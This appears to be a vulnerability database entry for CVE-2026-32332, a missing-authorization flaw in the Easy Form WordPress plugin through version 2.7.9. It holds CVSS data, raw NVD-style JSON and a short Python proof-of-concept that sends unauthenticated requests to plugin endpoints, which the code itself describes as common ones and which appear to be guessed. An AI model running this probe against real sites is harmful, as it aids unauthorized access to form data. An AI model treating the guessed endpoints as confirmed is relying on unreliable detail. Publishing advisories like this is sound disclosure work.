Security Vulnerability Report
中文
CVE-2026-32332 CVSS 5.3 MEDIUM

CVE-2026-32332

Published: 2026-03-13 19:54:44
Last Modified: 2026-04-29 10:16:58

Description

Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Easy Form插件 <= 2.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32332 PoC - Missing Authorization in Easy Form WordPress Plugin # Target: WordPress site with Easy Form plugin <= 2.7.9 TARGET_URL = "https://example.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32332 Missing Authorization vulnerability in Easy Form plugin """ # Common Easy Form API endpoints that should require authentication endpoints = [ "/wp-json/ays-form/v1/forms", "/wp-json/ays-form/v1/submissions", "/wp-admin/admin-ajax.php?action=ays_form_export", "/wp-admin/admin-ajax.php?action=ays_form_save" ] for endpoint in endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, timeout=10) # If we get a successful response without authentication if response.status_code == 200: print(f"[+] Potential vulnerability at: {url}") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32332", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:43.763", "lastModified": "2026-04-29T10:16:58.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ays Pro Easy Form easy-form permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Easy Form: desde n/a hasta &lt;= 2.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-form/vulnerability/wordpress-easy-form-plugin-2-7-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}